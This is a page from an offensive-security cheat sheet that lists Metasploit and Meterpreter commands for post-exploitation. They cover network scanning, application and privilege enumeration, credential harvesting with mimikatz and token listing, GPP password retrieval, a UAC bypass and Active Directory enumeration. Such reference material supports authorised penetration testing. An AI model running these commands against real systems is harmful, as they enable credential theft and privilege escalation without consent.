🕺
CheatSheets
  • Introduction
  • Getting Started With Hacking
  • VMs on Mac
  • Windows
    • Enumeration
    • Local Privilege Escalation
    • UAC Bypasses
    • Persistance
    • Networking
  • Active Directory
    • Offensive Powershell
    • Enumeration
      • BloodHound
    • Lateral Movement
    • Escalation
      • ACL Abuse
      • Kerberoasting
      • Un-Constrained Delegation
      • JEA
    • Persistance
    • Mimikatz
    • Alternate Cred Dumps
    • MSSQL
    • Defences and Bypasses
    • Setting Up a Lab
  • Red Teaming
    • Phishing Payloads
    • Cobalt Strike
    • Metasploit
    • Sliver
  • Linux
    • Networking
    • Enumeration
    • Local Privilege Escalation
    • Persistance
    • MySQL
  • Mainframes
    • HP Nonstop
    • IBM z/OS
  • Cloud
    • AWS
    • GCP
    • Azure
  • Web App
    • Tomcat
    • SQLMap
    • PHP
  • Mobile
    • Android
    • iOS
  • Exploit-Dev
    • Linux
      • Basic Stack Overflows
      • Bypassing NX (DEP)
      • Bypassing ASLR
    • Shellcode
    • Windows
  • WiFi
    • Alfa AWUS036ACH Setup
    • Aircrack-ng
Powered by GitBook
On this page
  • Meterpreter
  • Arp Scan
  • Nmap
  • PortScan
  • Application Info
  • Credential Gathering
  • Windows
  • AD

Was this helpful?

  1. Red Teaming

Metasploit

Meterpreter

Arp Scan 

run arp_scanner -r <iP>/24

Nmap

db_nmap -sS -A <IP>

PortScan

run auxiliary/scanner/portscan/tcp

Application Info

run post/windows/gather/enum_applications

Credential Gathering 

run post/windows/gather/credentials/credential_collector

load mimikatz
wdigest

load incognito 
list_tokens -u

Windows 

# Collect a load of info 
run winenum

# Show privs
run post/windows/gather/win_privs

# Run as 
use exploit/windows/local/run_as

# Bypass UAC
use exploit/windows/local/bypassuac_injection

AD 

# Enumeration ADSI
load extapi
help extapi 

adsi_computer_enum domainname 

# GPP 
use post/windows/gather/credentials/gpp
PreviousCobalt StrikeNextSliver

Last updated 27 days ago

Was this helpful?